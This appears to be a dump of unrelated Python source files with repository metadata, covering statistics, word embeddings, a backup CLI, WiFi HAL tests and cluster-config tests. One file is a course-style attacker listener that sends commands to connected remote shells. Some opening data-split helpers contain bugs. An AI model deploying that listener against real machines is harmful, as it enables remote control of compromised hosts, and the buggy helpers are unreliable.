# Split a dataframe into train, val, and test sets
def df_split(df, target):
train1, val = train_test_split(
df, train_size=0.85, test_size=0.15, stratify=df[target], random_state=42)
train2, test = train_test_split(
train1, train_size=0.8, test_size=0.2, stratify=df[target], random_state=42)
return(train2, val, test)
# Assign datetime datatype to a column and then split into year, month,
# and day columns
def date_split(df, column):
df[column] = pd.to_datetime(df[column], infer_datetime_format=True)
new_df = df.copy()
new_df['year'] = new_df[column].DateTimeIndex(new_df[column]).year
new_df['month'] = new_df[column].DateTimeIndex(new_df[column]).month
new_df['day'] = new_df[column].DateTimeIndex(new_df[column]).day
new_df = new_df.drop(columns=column)
return(new_df)
# this code breaks our ability to import enlarge from other files, if left
# in the global scope:
if __name__ == "__main__":
# # only run the code below IF this script is invoked from the command-line
# # not if it is imported from another script
print("HELLO")
y = int(input("Please choose a number: "))
print(y, enlarge(y))
| 30.608696
| 84
| 0.693892
|
7a876b0f344d9ea7c80390421c5db695701e6a46
| 6,266
|
py
|
Python
|
dsfs/statistics/stats_base.py
|
Infi-Knight/data_science_from_scratch
|
a78317728f218d4259fab925112413ddddfc30ca
|
[
"MIT"
] | null | null | null |
dsfs/statistics/stats_base.py
|
Infi-Knight/data_science_from_scratch
|
a78317728f218d4259fab925112413ddddfc30ca
|
[
"MIT"
] | null | null | null |
dsfs/statistics/stats_base.py
|
Infi-Knight/data_science_from_scratch
|
a78317728f218d4259fab925112413ddddfc30ca
|
[
"MIT"
] | null | null | null |
from dsfs.linear_algebra.vectors import sum_of_squares, dot
from collections import Counter
import math
import matplotlib.pyplot as plt
num_friends = [100, 49, 41, 40, 25, 21, 21, 19, 19, 18, 18, 16, 15, 15, 15, 15, 14, 14, 13, 13, 13, 13, 12, 12, 11, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 9, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 8, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 6, 6, 6, 6, 6, 6, 6,
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
def make_friend_counts_histogram():
friend_counts = Counter(num_friends)
xs = range(101)
ys = [friend_counts[x] for x in xs]
plt.bar(xs, ys)
plt.axis([0, 101, 0, 25])
plt.title("Histogram of Friend Counts")
plt.xlabel("# of friends")
plt.ylabel("# of people")
plt.show()
num_points = len(num_friends) # 204
largest_value = max(num_friends) # 100
smallest_value = min(num_friends) # 1
sorted_values = sorted(num_friends)
smallest_value = sorted_values[0] # 1
second_smallest_value = sorted_values[1] # 1
second_largest_value = sorted_values[-2] # 49
# this isn't right if you don't from __future__ import division
def mean(x):
return sum(x) / len(x)
def median(v):
"""finds the 'middle-most' value of v"""
n = len(v)
sorted_v = sorted(v)
midpoint = n // 2
if n % 2 == 1:
# if odd, return the middle value
return sorted_v[midpoint]
else:
# if even, return the average of the middle values
lo = midpoint - 1
hi = midpoint
return (sorted_v[lo] + sorted_v[hi]) / 2
def quantile(x, p):
"""returns the pth-percentile value in x"""
p_index = int(p * len(x))
return sorted(x)[p_index]
def mode(x):
"""returns a list, might be more than one mode"""
counts = Counter(x)
max_count = max(counts.values())
return [x_i for x_i, count in counts.items()
if count == max_count]
# "range" already means something in Python, so we'll use a different name
def data_range(x):
return max(x) - min(x)
def de_mean(x):
"""translate x by subtracting its mean (so the result has mean 0)"""
x_bar = mean(x)
return [x_i - x_bar for x_i in x]
def variance(x):
"""assumes x has at least two elements"""
n = len(x)
deviations = de_mean(x)
return sum_of_squares(deviations) / (n - 1)
def standard_deviation(x):
return math.sqrt(variance(x))
def interquartile_range(x):
return quantile(x, 0.75) - quantile(x, 0.25)
####
#
# CORRELATION
#
#####
daily_minutes = [1, 68.77, 51.25, 52.08, 38.36, 44.54, 57.13, 51.4, 41.42, 31.22, 34.76, 54.01, 38.79, 47.59, 49.1, 27.66, 41.03, 36.73, 48.65, 28.12, 46.62, 35.57, 32.98, 35, 26.07, 23.77, 39.73, 40.57, 31.65, 31.21, 36.32, 20.45, 21.93, 26.02, 27.34, 23.49, 46.94, 30.5, 33.8, 24.23, 21.4, 27.94, 32.24, 40.57, 25.07, 19.42, 22.39, 18.42, 46.96, 23.72, 26.41, 26.97, 36.76, 40.32, 35.02, 29.47, 30.2, 31, 38.11, 38.18, 36.31, 21.03, 30.86, 36.07, 28.66, 29.08, 37.28, 15.28, 24.17, 22.31, 30.17, 25.53, 19.85, 35.37, 44.6, 17.23, 13.47, 26.33, 35.02, 32.09, 24.81, 19.33, 28.77, 24.26, 31.98, 25.73, 24.86, 16.28, 34.51, 15.23, 39.72, 40.8, 26.06, 35.76, 34.76, 16.13, 44.04, 18.03, 19.65, 32.62,
35.59, 39.43, 14.18, 35.24, 40.13, 41.82, 35.45, 36.07, 43.67, 24.61, 20.9, 21.9, 18.79, 27.61, 27.21, 26.61, 29.77, 20.59, 27.53, 13.82, 33.2, 25, 33.1, 36.65, 18.63, 14.87, 22.2, 36.81, 25.53, 24.62, 26.25, 18.21, 28.08, 19.42, 29.79, 32.8, 35.99, 28.32, 27.79, 35.88, 29.06, 36.28, 14.1, 36.63, 37.49, 26.9, 18.58, 38.48, 24.48, 18.95, 33.55, 14.24, 29.04, 32.51, 25.63, 22.22, 19, 32.73, 15.16, 13.9, 27.2, 32.01, 29.27, 33, 13.74, 20.42, 27.32, 18.23, 35.35, 28.48, 9.08, 24.62, 20.12, 35.26, 19.92, 31.02, 16.49, 12.16, 30.7, 31.22, 34.65, 13.13, 27.51, 33.2, 31.57, 14.1, 33.42, 17.44, 10.12, 24.42, 9.82, 23.39, 30.93, 15.03, 21.67, 31.09, 33.29, 22.61, 26.89, 23.48, 8.38, 27.81, 32.35, 23.84]
def covariance(x, y):
n = len(x)
return dot(de_mean(x), de_mean(y)) / (n - 1)
def correlation(x, y):
stdev_x = standard_deviation(x)
stdev_y = standard_deviation(y)
if stdev_x > 0 and stdev_y > 0:
return covariance(x, y) / stdev_x / stdev_y
else:
return 0 # if no variation, correlation is zero
outlier = num_friends.index(100) # index of outlier
num_friends_good = [x
for i, x in enumerate(num_friends)
if i != outlier]
daily_minutes_good = [x
for i, x in enumerate(daily_minutes)
if i != outlier]
if __name__ == "__main__":
print("num_points", len(num_friends))
print("largest value", max(num_friends))
print("smallest value", min(num_friends))
print("second_smallest_value", sorted_values[1])
print("second_largest_value", sorted_values[-2])
print("mean(num_friends)", mean(num_friends))
print("median(num_friends)", median(num_friends))
print("quantile(num_friends, 0.10)", quantile(num_friends, 0.10))
print("quantile(num_friends, 0.25)", quantile(num_friends, 0.25))
print("quantile(num_friends, 0.75)", quantile(num_friends, 0.75))
print("quantile(num_friends, 0.90)", quantile(num_friends, 0.90))
print("mode(num_friends)", mode(num_friends))
print("data_range(num_friends)", data_range(num_friends))
print("variance(num_friends)", variance(num_friends))
print("standard_deviation(num_friends)", standard_deviation(num_friends))
print("interquartile_range(num_friends)", interquartile_range(num_friends))
print("covariance(num_friends, daily_minutes)",
covariance(num_friends, daily_minutes))
print("correlation(num_friends, daily_minutes)",
correlation(num_friends, daily_minutes))
print("correlation(num_friends_good, daily_minutes_good)",
correlation(num_friends_good, daily_minutes_good))
| 40.166667
| 719
| 0.600543
|
bd0ff62b257fa147518e8e037082629c867e80e6
| 4,684
|
py
|
Python
|
word_embedder/embedders/keyed_vectors.py
|
Yoctol/word-embedder
|
0b4a0afc4c5f9a2af596a3ada060a2360a51579e
|
[
"MIT"
] | 3
|
2019-04-29T21:59:49.000Z
|
2020-04-01T15:34:21.000Z
|
word_embedder/embedders/keyed_vectors.py
|
Yoctol/word-embedder
|
0b4a0afc4c5f9a2af596a3ada060a2360a51579e
|
[
"MIT"
] | 2
|
2018-09-17T05:48:52.000Z
|
2018-09-19T04:26:46.000Z
|
word_embedder/embedders/keyed_vectors.py
|
Yoctol/word-embedder
|
0b4a0afc4c5f9a2af596a3ada060a2360a51579e
|
[
"MIT"
] | 2
|
2019-06-03T02:19:00.000Z
|
2020-09-23T15:29:15.000Z
|
import io
import warnings
from os.path import isfile, basename
import os
from typing import List
import numpy as np
from .base import Embedder
from .oov_error import OOVError
from .utils import download_data, extract_gz
def _load_text_file(path: str):
fin = io.open(
path, 'r',
encoding='utf-8',
newline='\n',
errors='ignore',
)
vocab_size, embedding_size = map(int, fin.readline().split())
vocab_list = ['0'] * vocab_size
word_vectors = np.random.rand(
vocab_size, embedding_size).astype(np.float32)
for idx, line in enumerate(fin):
tokens = line.rstrip().split(' ')
vocab_list[idx] = tokens[0]
vector = list(map(float, tokens[1:]))
word_vectors[idx, :] = np.array(vector).astype(np.float32)
fin.close()
return embedding_size, vocab_size, vocab_list, word_vectors
def _load_bin_file(path: str):
# load .bin file
# Note that float in this file should be float32
# float64 is not allowed
fin = open(path, 'rb')
header = fin.readline().decode('utf8')
vocab_size, embedding_size = (int(x) for x in header.split())
# init vocab list
vocab_list = ['0'] * vocab_size
word_vectors = np.random.rand(
vocab_size, embedding_size).astype(np.float32)
binary_len = 4 * embedding_size # float32
for idx in range(vocab_size):
# mixed text and binary: read text first, then binary
word = []
while True:
ch = fin.read(1)
if ch == b' ':
break
if ch == b'':
raise EOFError(
"unexpected end of input; is count incorrect or file otherwise damaged?")
# ignore newlines in front of words (some binary files have)
if ch != b'\n':
word.append(ch)
vocab_list[idx] = b''.join(word).decode('utf8')
word_vectors[idx, :] = np.frombuffer(
fin.read(binary_len),
dtype='float32',
)
fin.close()
return embedding_size, vocab_size, vocab_list, word_vectors
class KeyedVectors(Embedder):
def __init__(self, path: str, binary: bool = False):
self._path = path
self._binary = binary
self._is_built = False
def build(self):
if not self._is_built:
if not isfile(self._path):
# if data is not at self._path
# download it through url in .env
download_data(
url=os.getenv(basename(self._path)),
output_path=self._path + '.gz',
)
extract_gz(self._path + '.gz')
(
self._embedding_size,
self._vocab_size,
self._vocab_list,
self._word_vectors,
) = self._load_data(
path=self._path,
binary=self._binary,
)
self._is_built = True
def __getitem__(self, key) -> np.ndarray:
"""Get a word vector
If key is an int, return vector by index.
If key is a string, return vector by word.
"""
if isinstance(key, str):
index = self.get_index(word=key)
elif isinstance(key, int):
index = key
else:
raise TypeError(
'Only support int and str type of input',
)
vector = self._get_vector(index)
return vector
@property
def n_vocab(self) -> int:
"""Vocabulary size"""
return self._vocab_size
@property
def n_dim(self) -> int:
"""Embedding size"""
return self._embedding_size
@property
def vocab(self) -> List[str]:
return self._vocab_list
def get_index(self, word: str) -> int:
try:
index = self._vocab_list.index(word)
except ValueError:
index = -1
return index
def get_word(self, index: int) -> str:
word = None
try:
word = self._vocab_list[index]
except IndexError:
warnings.warn(
f"index [{index}] out of range (max vocab size = {self._vocab_size})",
RuntimeWarning,
)
return word
def _get_vector(self, index: int) -> np.ndarray:
if (index >= 0) and (index < self._vocab_size):
return self._word_vectors[index, :]
else:
raise OOVError
@staticmethod
def _load_data(path: str, binary: bool = False):
if binary:
return _load_bin_file(path=path)
else:
return _load_text_file(path=path)
| 28.736196
| 93
| 0.554868
|
bd51b134a8f2523e200140f66f26e661b1632915
| 2,080
|
py
|
Python
|
dotbak/controllers/base.py
|
datafolklabs/dotbak
|
c2d63a8f2c5d36d4e57a98f55602cd32a8f846ad
|
[
"BSD-3-Clause"
] | 2
|
2021-01-18T01:46:29.000Z
|
2021-10-06T01:57:06.000Z
|
dotbak/controllers/base.py
|
datafolklabs/dotbak
|
c2d63a8f2c5d36d4e57a98f55602cd32a8f846ad
|
[
"BSD-3-Clause"
] | 2
|
2021-09-30T19:53:53.000Z
|
2021-12-18T19:45:05.000Z
|
dotbak/controllers/base.py
|
datafolklabs/dotbak
|
c2d63a8f2c5d36d4e57a98f55602cd32a8f846ad
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from datetime import datetime
from cement import Controller, ex
from cement.utils import fs
from cement.utils.version import get_version_banner
from ..core.version import get_version
from ..core import exc
VERSION_BANNER = """
Lazily Backup Files and Directories %s
%s
""" % (get_version(), get_version_banner())
class Base(Controller):
class Meta:
label = 'base'
# text displayed at the top of --help output
description = 'Lazily Backup Files and Directories'
# text displayed at the bottom of --help output
epilog = 'Usage: dotbak /path/to/file'
# controller level arguments. ex: 'dotbak --version'
arguments = [
### add a version banner
( [ '-v', '--version' ],
{ 'action' : 'version',
'version' : VERSION_BANNER } ),
( [ '-s', '--suffix' ],
{ 'action' : 'store',
'dest' : 'suffix' ,
'help' : 'backup file/dir suffix (extension)' } ),
( [ 'path' ],
{ 'action' : 'store',
'help' : 'path to file/dir to backup' } ),
]
def _clean_path(self, path):
RSTRIP = ['/', '\\']
for char in RSTRIP:
path = self.app.pargs.path.rstrip(char)
res = fs.abspath(path)
return res
def _default(self):
"""Default action if no sub-command is passed."""
path = self._clean_path(self.app.pargs.path)
if self.app.pargs.suffix is not None:
suffix = self.app.pargs.suffix
else:
suffix = self.app.config.get('dotbak', 'suffix')
if self.app.config.get('dotbak', 'timestamps') is True:
timestamp = datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
suffix = f'{suffix}-{timestamp}'
if not os.path.exists(self.app.pargs.path):
raise exc.DotBakError(f'Path does not exist: {path}')
res = fs.backup(path, suffix=suffix)
self.app.log.info(f'Copied {path} -> {res}')
| 30.144928
| 69
| 0.546154
|
cc9f7c4abd96b899e296760c9132c78e77a3a2a3
| 1,358
|
py
|
Python
|
006 - Simple Netcat Replacement/attacker_server.py
|
Danziger/Pluralsight-Network-Penetration-Testing-Using-Python-and-Kali-Linux
|
040acfb55470f97a3a1c6e6d392cd0cdfc84eff8
|
[
"MIT"
] | 5
|
2017-11-12T12:53:28.000Z
|
2020-11-02T06:16:45.000Z
|
006 - Simple Netcat Replacement/attacker_server.py
|
cyborix/Pluralsight-Network-Penetration-Testing-Using-Python-and-Kali-Linux
|
5bcbc41889c6bd65aaad312b9b429dc189b8d0d1
|
[
"MIT"
] | null | null | null |
006 - Simple Netcat Replacement/attacker_server.py
|
cyborix/Pluralsight-Network-Penetration-Testing-Using-Python-and-Kali-Linux
|
5bcbc41889c6bd65aaad312b9b429dc189b8d0d1
|
[
"MIT"
] | 6
|
2016-06-20T00:27:31.000Z
|
2019-02-14T14:28:45.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import socket
import argparse
import threading
clients = {}
def client_serve(client):
try:
print 'Enter a command to execute: '
command = sys.stdin.read()
client.send(command)
while True:
# Wait for data from listener
print client.recv(4096)
# Wait for more input
command = raw_input('')
command += '\n'
client.send(command)
except:
print 'Client closed the connection'
pass
def server_listen(port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(('0.0.0.0', port))
listener.listen(25) # Max. clients
print 'Server listening on port %s...' % port
while True:
client, addr = listener.accept()
print 'Incoming connection from %s:%d' % (addr[0], addr[1])
clients[addr[0]] = client
client_serve_thread = threading.Thread(target=client_serve, args=(client,))
client_serve_thread.start()
def main():
parser = argparse.ArgumentParser('Attacker\'s Listening Server')
parser.add_argument('-p', '--port', type=int, help='The port number to connext with', default=9999)
args = parser.parse_args()
server_listen(args.port)
if __name__ == '__main__':
main()
| 22.633333
| 103
| 0.613402
|
f70e640ff57f2e199fac15fbee0fe2c1a0c1d44c
| 2,362
|
py
|
Python
|
src/api/infrastructure/utils/TypeChecker.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 14
|
2020-12-19T15:06:13.000Z
|
2022-01-12T19:52:17.000Z
|
src/process/infrastructure/utils/TypeChecker.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 43
|
2021-01-06T22:05:22.000Z
|
2022-03-10T10:30:30.000Z
|
src/api/infrastructure/utils/TypeChecker.py
|
PythonDataIntegrator/pythondataintegrator
|
6167778c36c2295e36199ac0d4d256a4a0c28d7a
|
[
"MIT"
] | 4
|
2020-12-18T23:10:09.000Z
|
2021-04-02T13:03:12.000Z
|
import inspect
import typing
from abc import ABC
import builtins
def get_builtins():
return list(filter(lambda x: not x.startswith('_'), dir(builtins)))
class ITypeChecker(ABC):
def is_class(self, obj):
if inspect.isclass(obj) and not self.is_primitive(obj):
return True
return False
def is_primitive(self, obj):
builtins_list = list(filter(lambda x: not x.startswith('_'), dir(builtins)))
return obj.__name__ in builtins_list
def is_generic(self, class_type):
pass
def is_base_generic(self, class_type):
pass
# python 3.7
if hasattr(typing, '_GenericAlias'):
class TypeChecker(ITypeChecker):
def is_generic(self, class_type):
return self._is_generic(class_type)
def is_base_generic(self, class_type):
return self._is_base_generic(class_type)
def _is_generic(self, cls):
if isinstance(cls, typing._GenericAlias):
return True
if isinstance(cls, typing._SpecialForm):
return cls not in {typing.Any}
return False
def _is_base_generic(self, cls):
if isinstance(cls, typing._GenericAlias):
if cls.__origin__ in {typing.Generic, typing._Protocol}:
return False
if isinstance(cls, typing._VariadicGenericAlias):
return True
return len(cls.__parameters__) > 0
if isinstance(cls, typing._SpecialForm):
return cls._name in {'ClassVar', 'Union', 'Optional'}
return False
elif hasattr(typing, '_Union'):
class TypeChecker(ITypeChecker):
# python 3.6
def is_generic(self, class_type):
return self._is_generic(class_type)
def is_base_generic(self, class_type):
return self._is_base_generic(class_type)
def _is_generic(self, cls):
if isinstance(cls, (typing.GenericMeta, typing._Union, typing._Optional, typing._ClassVar)):
return True
return False
def _is_base_generic(self, cls):
if isinstance(cls, (typing.GenericMeta, typing._Union)):
return cls.__args__ in {None, ()}
if isinstance(cls, typing._Optional):
return True
return False
| 31.493333
| 104
| 0.6105
|
547791321adae390e0e905b7d7ad1108b3118ad2
| 10,939
|
py
|
Python
|
testscripts/RDKB/component/WIFIHAL/TS_WIFIHAL_StartOrStopHostApd.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/WIFIHAL/TS_WIFIHAL_StartOrStopHostApd.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
testscripts/RDKB/component/WIFIHAL/TS_WIFIHAL_StartOrStopHostApd.py
|
rdkcmf/rdkb-tools-tdkb
|
9f9c3600cd701d5fc90ac86a6394ebd28d49267e
|
[
"Apache-2.0"
] | null | null | null |
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2020 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version='1.0' encoding='utf-8'?>
<xml>
<id></id>
<!-- Do not edit id. This will be auto filled while exporting. If you are adding a new script keep the id empty -->
<version>10</version>
<!-- Do not edit version. This will be auto incremented while updating. If you are adding a new script you can keep the vresion as 1 -->
<name>TS_WIFIHAL_StartOrStopHostApd</name>
<!-- If you are adding a new script you can specify the script name. Script Name should be unique same as this file name with out .py extension -->
<primitive_test_id> </primitive_test_id>
<!-- Do not change primitive_test_id if you are editing an existing script. -->
<primitive_test_name>WIFIHAL_StartorStopHostApd</primitive_test_name>
<!-- -->
<primitive_test_version>1</primitive_test_version>
<!-- -->
<status>FREE</status>
<!-- -->
<synopsis>To start or stop Host Apd using wifi_startHostApd() and wifi_stopHostApd() and validate the same using wifi_getApStatus() api.</synopsis>
<!-- -->
<groups_id />
<!-- -->
<execution_time>5</execution_time>
<!-- -->
<long_duration>false</long_duration>
<!-- -->
<advanced_script>false</advanced_script>
<!-- execution_time is the time out time for test execution -->
<remarks></remarks>
<!-- Reason for skipping the tests if marked to skip -->
<skip>false</skip>
<!-- -->
<box_types>
<box_type>Broadband</box_type>
<!-- -->
<box_type>Emulator</box_type>
<!-- -->
<box_type>RPI</box_type>
<!-- -->
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
<!-- -->
</rdk_versions>
<test_cases>
<test_case_id>TC_WIFIHAL_284</test_case_id>
<test_objective>To start or stop Host Apd using wifi_startHostApd() and wifi_stopHostApd() and validate the same using wifi_getApStatus() api.</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband,Emulator,RPI</test_setup>
<pre_requisite>1.Ccsp Components should be in a running state else invoke cosa_start.sh manually that includes all the ccsp components and TDK Component
2.TDK Agent should be in running state or invoke it through StartTdk.sh script</pre_requisite>
<api_or_interface_used>wifi_startHostApd()
wifi_stopHostApd()
wifi_getApStatus()
wifi_getApEnable()
wifi_setApEnable()</api_or_interface_used>
<input_parameters>methodName : startHostApd
methodName : stopHostApd
methodName : getApStatus
methodName : getApEnable
methodName : setApEnable
radioIndex : 0
radioIndex : 1</input_parameters>
<automation_approch>1.Get the ApEnable value using wifi_getApEnable() for both 2.4GHz and 5GHz.
2.If the value is Enabled,get the Ap Status for both 2.4GHz and 5GHz using wifi_getApStatus() api.
3.If the value is not Enabled,set the ApEnable to Enabled using wifi_setApEnable() api and get the Ap Status for both 2.4GHz and 5GHz.
4.If the Ap status is 'Up' for either 2.4GHz or 5GHz, call the wifi_stopHostApd() api else call the wifi_startHostApd() api.
5.Get the Ap status and check whether the status is changed after calling wifi_startHostApd() or wifi_stopHostApd() api for both 2.4GHz and 5GHz.
6.If changed,return SUCCESS,else FAILURE.
7.Unload the module.</automation_approch>
<expected_output>Ap Status should change after invoking wifi_startHostApd() and wifi_stopHostApd() for both 2.4GHz and 5GHz.</expected_output>
<priority>High</priority>
<test_stub_interface>WIFIHAL</test_stub_interface>
<test_script>TS_WIFIHAL_StartOrStopHostApd</test_script>
<skipped>No</skipped>
<release_version></release_version>
<remarks></remarks>
</test_cases>
<script_tags />
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
import time;
from wifiUtility import *;
radio0 = "2.4G"
radio1 = "5G"
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("wifihal","1");
#IP and Port of box, No need to change,
#This will be replaced with correspoing Box Ip and port while executing script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_WIFIHAL_StartOrStopHostApd');
#Get the result of connection with test component and DUT
loadmodulestatus =obj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %loadmodulestatus ;
def GetApStatus(radioIndex):
expectedresult="SUCCESS";
getMethod = "getApStatus"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
#Calling the method from wifiUtility to execute test case and set result status for the test.
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, radioIndex, "0", getMethod)
if expectedresult in actualresult:
tdkTestObj.setResultStatus("SUCCESS");
return (details.split(":")[1].strip());
else:
tdkTestObj.setResultStatus("FAILURE");
if "SUCCESS" in loadmodulestatus.upper():
obj.setLoadModuleStatus("SUCCESS");
tdkTestObjTemp, idx0 = getIndex(obj, radio0);
tdkTestObjTemp, idx1 = getIndex(obj, radio1);
## Check if a invalid index is returned
if idx0 == -1 or idx1 == -1:
if idx0 == -1 :
print "Failed to get radio index for radio %s\n" %radio0;
if idx1 == -1:
print "Failed to get radio index for radio %s\n" %radio1;
tdkTestObjTemp.setResultStatus("FAILURE");
else:
status0_initial = GetApStatus(idx0);
print"InitialApStatus for 2.4GHz = ",status0_initial;
status1_initial = GetApStatus(idx1);
print"InitialApStatus for 5GHz = ",status1_initial;
if status0_initial == 'Up' or status1_initial == 'Up':
print"********INVOKING wifi_stopHostApd() api********";
#Primitive test case which associated to this Script
tdkTestObj = obj.createTestStep('WIFIHAL_StartorStopHostApd');
#Giving the method name to invoke the api wifi_stopHostApd()
tdkTestObj.addParameter("methodName","stopHostApd");
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
tdkTestObj.setResultStatus("SUCCESS");
time.sleep(5);
status0_final = GetApStatus(idx0);
status1_final = GetApStatus(idx1);
print"ApStatus for 2.4GHz after calling stopHostApd is ",status0_final;
print"ApStatus for 5GHz after calling stopHostApd is ",status1_final;
if status0_final == 'Disable' and status1_final == 'Disable':
tdkTestObj.setResultStatus("SUCCESS");
print"TEST STEP:To stop the HostApd using wifi_stopHostApd() api and check whether the Apstatus is changed";
print"EXPECTED RESULT:The ApStatus should be changed to 'Disable' for both 2.4GHz and 5GHz";
print"ACTUAL RESULT:The ApStatus is changed to 'Disable' for both 2.4GHz and 5GHz";
print"[TEST EXECUTION RESULT]:SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print"TEST STEP:To stop the HostApd using wifi_stopHostApd() api and check whether the Apstatus is changed";
print"EXPECTED RESULT:The ApStatus should be changed to 'Disable' for both 2.4GHz and 5GHz";
print"ACTUAL RESULT:The ApStatus is not changed to 'Disable' for both 2.4GHz and 5GHz";
print"[TEST EXECUTION RESULT]:FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print"StopHostApd() operation failed";
elif status0_initial == 'Disable' or status1_initial == 'Disable':
print"********INVOKING wifi_startHostApd() api********";
#Primitive test case which associated to this Script
tdkTestObj = obj.createTestStep('WIFIHAL_StartorStopHostApd');
#Giving the method name to invoke the api wifi_startHostApd()
tdkTestObj.addParameter("methodName","startHostApd");
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
tdkTestObj.setResultStatus("SUCCESS");
time.sleep(5);
status0_final = GetApStatus(idx0);
status1_final = GetApStatus(idx1);
print"ApStatus for 2.4GHz after calling startHostApd is ",status0_final;
print"ApStatus for 5GHz after calling startHostApd is ",status1_final;
if status0_final == 'Up' and status1_final == 'Up':
tdkTestObj.setResultStatus("SUCCESS");
print"TEST STEP:To start the HostApd using wifi_startHostApd() api and check whether the Apstatus is changed";
print"EXPECTED RESULT:The ApStatus should be changed to 'Up' for both 2.4GHz and 5GHz";
print"ACTUAL RESULT:The ApStatus is changed to 'Up' for both 2.4GHz and 5GHz";
print"[TEST EXECUTION RESULT]:SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print"TEST STEP:To start the HostApd using wifi_startHostApd() api and check whether the Apstatus is changed";
print"EXPECTED RESULT:The ApStatus should be changed to 'Up' for both 2.4GHz and 5GHz";
print"ACTUAL RESULT:The ApStatus is not changed to 'Up' for both 2.4GHz and 5GHz";
print"[TEST EXECUTION RESULT]:FAILURE";
else:
tdkTestObj.setResultStatus("FAILURE");
print"StartHostApd() operation failed";
else:
print "wifi_getApStatus is returning invalid status";
tdkTestObj.setResultStatus("FAILURE");
obj.unloadModule("wifihal");
else:
print "Failed to load wifi module";
obj.setLoadModuleStatus("FAILURE");
| 50.643519
| 163
| 0.668617
|
0f56accaa660269e0141f7f93780696b44c86881
| 7,746
|
py
|
Python
|
cli/tests/pcluster/config/test_section_raid.py
|
gkao123/aws-parallelcluster
|
e46b91d5a6d8d8ba39e43188e19fdb7525313473
|
[
"Apache-2.0"
] | null | null | null |
cli/tests/pcluster/config/test_section_raid.py
|
gkao123/aws-parallelcluster
|
e46b91d5a6d8d8ba39e43188e19fdb7525313473
|
[
"Apache-2.0"
] | null | null | null |
cli/tests/pcluster/config/test_section_raid.py
|
gkao123/aws-parallelcluster
|
e46b91d5a6d8d8ba39e43188e19fdb7525313473
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import tests.pcluster.config.utils as utils
from pcluster.config.mappings import RAID
from tests.pcluster.config.defaults import DefaultCfnParams, DefaultDict
@pytest.mark.parametrize(
"cfn_params_dict, expected_section_dict",
[
(DefaultCfnParams["raid"].value, DefaultDict["raid"].value),
({}, DefaultDict["raid"].value),
({"RAIDOptions": "NONE, NONE, NONE, NONE, NONE, NONE, NONE, NONE"}, DefaultDict["raid"].value),
({"RAIDOptions": "NONE,NONE,NONE,NONE,NONE,NONE,NONE,NONE"}, DefaultDict["raid"].value),
(
{"RAIDOptions": "test,NONE,NONE,NONE,NONE,NONE,NONE,NONE"},
{
"shared_dir": "test",
"raid_type": None,
"num_of_raid_volumes": 2,
"volume_type": "gp2",
"volume_size": 20,
"volume_iops": 100,
"encrypted": False,
"ebs_kms_key_id": None,
},
),
(
{"RAIDOptions": "test,0,3,gp2,30,200,true,test"},
{
"shared_dir": "test",
"raid_type": 0,
